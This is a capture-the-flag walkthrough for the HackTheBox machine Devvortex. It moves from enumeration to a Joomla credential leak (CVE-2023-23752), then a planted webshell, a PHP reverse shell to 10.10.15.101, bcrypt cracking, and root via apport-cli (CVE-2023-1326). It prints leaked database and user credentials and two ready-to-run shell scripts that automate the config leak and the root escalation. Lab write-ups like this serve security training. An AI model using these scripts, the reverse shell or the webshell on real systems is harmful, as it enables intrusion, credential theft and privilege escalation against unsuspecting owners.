Devvortex

Enumeration
nmap -A -p- -sC -sV -Pn -v devvortex.htb
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: DevVortex
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/5%OT=22%CT=1%CU=38991%PV=Y%DS=2%DC=T%G=Y%TM=65C16
OS:2D7%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST
OS:11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)
Uptime guess: 34.562 days (since Tue Jan 2 04:06:17 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 45.82 ms 10.10.14.1
2 45.89 ms devvortex.htb (10.10.11.242)
NSE: Script Post-scanning.
Initiating NSE at 17:36
Completed NSE at 17:36, 0.00s elapsed
Initiating NSE at 17:36
Completed NSE at 17:36, 0.00s elapsed
Initiating NSE at 17:36
Completed NSE at 17:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.77 seconds
Raw packets sent: 66004 (2.908MB) | Rcvd: 65653 (2.635MB)
Port 80

Enumerating hidden directories and files does not reveal anything useful:
gobuster dir -u http://devvortex.htb/ -w /usr/share/wordlists/dirb/common.txt

Fuzzing with the extensions of common backend technologies also turns up nothing:
ffuf -u http://devvortex.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt -ic -t 400 -e .php,.html,.txt

Next we enumerated virtual hosts by fuzzing the Host header (nginx routes on the Host header, so this works without any DNS records), which revealed an additional vhost, dev.devvortex.htb:
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://devvortex.htb/ -H "Host: FUZZ.devvortex.htb" -mc 200

Add the vhost dev.devvortex.htb to /etc/hosts and enumerate it:

Try to enumerate some hidden directories:
gobuster dir -u http://dev.devvortex.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

/robots.txt:

/administrator:

The Joomla version can be read from the manifest file, which is served without authentication:
/administrator/manifests/files/joomla.xml

/api:


Info
nginx/1.18.0 (Ubuntu)
vhost dev.devvortex.htb
Joomla 4.2.6
/api enabled
Exploitation
To check whether this version of Joomla is vulnerable, we can try an exploit for CVE-2023-23752:
Joomla! 4.0.0 through 4.2.7 is affected by an improper access check that allows unauthenticated access to web service endpoints, including the application configuration, which contains the database credentials. Joomla 4.2.6 is in the affected range.
The exploit is written in Ruby, so we need to install its dependencies:

Download the Gemfile, install the dependencies with bundle install
and run the exploit:


Info
Database info
username: lewis
password: P4ntherg0t1n5r3c0n##
db name: joomla
db type: mysql
db prefix: sd4fg_
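The same information the Ruby exploit prints can be pulled by hand with curl. The script below is an added example, not code from this write-up or from the exploit it uses: it queries the two Joomla API endpoints that CVE-2023-23752 exposes (config/application and users) with the public=true parameter that bypasses the access check, and merges the per-setting objects Joomla returns so that individual keys can be looked up. The target URL is an assumption taken from the vhost found above, and the embedded JSON is a constructed, trimmed sample of the real response shape so the parsing can be exercised offline.

```shell
#!/bin/sh
# Added example, not code from the write-up or from the Ruby exploit it uses:
# reproduce CVE-2023-23752 by hand. On Joomla 4.0.0 - 4.2.7 the API serves
# /api/index.php/v1/config/application and /api/index.php/v1/users to anyone
# once ?public=true is appended. Assumption: the site is reachable at
# http://dev.devvortex.htb (override with TARGET=...).
TARGET="${TARGET:-http://dev.devvortex.htb}"

# Constructed sample of the config/application response (trimmed to the keys
# that matter). Joomla emits one object per setting, so the attributes have to
# be merged before a key can be looked up.
SAMPLE_CONFIG='{"data":[{"type":"application","id":224,"attributes":{"dbtype":"mysql","id":224}},{"type":"application","id":224,"attributes":{"user":"lewis","id":224}},{"type":"application","id":224,"attributes":{"password":"P4ntherg0t1n5r3c0n##","id":224}},{"type":"application","id":224,"attributes":{"db":"joomla","id":224}},{"type":"application","id":224,"attributes":{"dbprefix":"sd4fg_","id":224}}]}'

# Read a JSON document on stdin and print the value of one attribute.
# Uses jq when available; the fallback only handles flat string values,
# which is all the database settings are.
json_attr() {
    key="$1"
    if command -v jq >/dev/null 2>&1; then
        jq -r --arg k "$key" '[.data[].attributes] | add | .[$k] // empty'
    else
        grep -o "\"$key\":\"[^\"]*\"" | head -n 1 | sed 's/^"[^"]*":"//; s/"$//'
    fi
}

# Unauthenticated GET against the Joomla API; public=true is the bypass.
api_get() {
    curl -s "$TARGET/api/index.php/v1/$1?public=true"
}

# Print the database settings from a config/application response on stdin.
print_db_config() {
    body="$(cat)"
    for k in dbtype user password db dbprefix; do
        printf '%s=%s\n' "$k" "$(printf '%s' "$body" | json_attr "$k")"
    done
}

case "${1:-}" in
    --run)
        api_get config/application | print_db_config
        # Account names are leaked the same way.
        api_get users | grep -o '"username":"[^"]*"' | sed 's/^"username":"//; s/"$//'
        ;;
    *)
        # Dry run against the constructed sample; no network access needed.
        printf '%s' "$SAMPLE_CONFIG" | print_db_config
        ;;
esac
```

Run it with --run against the live host to fetch the real configuration; without arguments it only parses the embedded sample. The merge step matters: the live response carries each setting in its own object, so a naive `.data[0].attributes.password` lookup returns nothing.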
Enumeration 2
Access /administrator section of Joomla using lewis credentials:

Add a new file cmd.php containing your preferred webshell (in Joomla 4 this can be done from System > Site Templates by editing an installed template such as Cassiopeia and creating a new file):


List OS users:
cat /etc/passwd

We need a reverse shell to get an interactive session for the MySQL client, since the webshell cannot drive the mysql prompt:
php -r '$sock=fsockopen("10.10.15.101",9000);exec("sh <&3 >&3 2>&3");'

Upgrade the shell to a pseudo-TTY:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Enumerate on MySQL:
mysql -u lewis -p

List tables:
use joomla;
SHOW TABLES;

List all users:
SELECT * FROM sd4fg_users;

logan paul | logan | [email protected] | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12
Try to crack this hash with hashcat.
Identify the hash mode (the $2y$ prefix is bcrypt, mode 3200):
hashcat --identify logan.hash

Crack it:
hashcat -m 3200 logan.hash /usr/share/wordlists/rockyou.txt

Privilege Escalation (logan)
Log in via SSH with the credentials logan:tequieromucho

Check which commands logan can run with sudo:


logan can run apport-cli as root via sudo, which is exactly the condition described in CVE-2023-1326: "A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege. It is extremely unlikely that a system administrator would configure sudo to allow unprivileged users to perform this class of exploit."
To generate a .crash report, run a simple command like this one:
sleep 60 &
Note the PID:

Send it a SIGSEGV so that apport writes a .crash report under /var/crash:
kill -SIGSEGV 18640


Open the report with sudo apport-cli and choose V to view it. To spawn a root shell, wait until the pager less shows its ':' prompt and then type !/bin/bash (the leading ! tells less to run a shell command; a bare /bin/bash would only be treated as a search pattern)
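The crash-and-open steps above, staged as a script. This is an added example, not code from the write-up: it derives the report path apport will use from the crashed binary and the uid, triggers the crash, waits for the report and then opens it under sudo with apport-cli's -c option. It assumes the sudo rule found above (apport-cli runnable as root without a password), that apport is active so the kernel hands the core dump to it, and that less is the pager; the final step inside less is still typed by hand.

```shell
#!/bin/sh
# Added example, not code from the write-up: the apport-cli escalation
# (CVE-2023-1326) staged as a script. Assumptions: sudo lets the current
# user run /usr/bin/apport-cli as root, apport is active so a SIGSEGV
# produces a report, and less is the pager apport-cli uses to view it.

# apport names reports after the crashed binary's path, with "/" replaced by
# "_", followed by the crashing user's uid (/usr/bin/sleep, uid 1000 gives
# /var/crash/_usr_bin_sleep.1000.crash).
crash_file_for() {
    printf '/var/crash/%s.%s.crash\n' "$(printf '%s' "$1" | tr '/' '_')" "$2"
}

# Crash a harmless process of our own with SIGSEGV and wait for apport to
# write the report. Prints the report path.
trigger_crash() {
    exe="$(readlink -f "$(command -v sleep)")"
    sleep 60 &
    pid=$!
    kill -s SEGV "$pid"
    wait "$pid" 2>/dev/null
    report="$(crash_file_for "$exe" "$(id -u)")"
    i=0
    while [ ! -f "$report" ] && [ "$i" -lt 15 ]; do
        sleep 1; i=$((i + 1))
    done
    [ -f "$report" ] || { echo "no report at $report (is apport enabled?)" >&2; return 1; }
    echo "$report"
}

# Open the report as root. At the apport prompt answer V (view); the report is
# then shown in less, where  !/bin/bash  runs a shell as root. A bare /bin/bash
# would only be taken as a search pattern by less.
escalate() {
    report="$(trigger_crash)" || return 1
    echo "Answer V at the prompt, then type !/bin/bash inside less" >&2
    sudo /usr/bin/apport-cli -c "$report"
}

# Only the --run flag does anything; otherwise the functions are just defined.
if [ "${1:-}" = "--run" ]; then
    escalate
fi
```

If the report never appears, check that apport is enabled (the service and /proc/sys/kernel/core_pattern) before blaming the sudo rule.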

Now we're finally root:
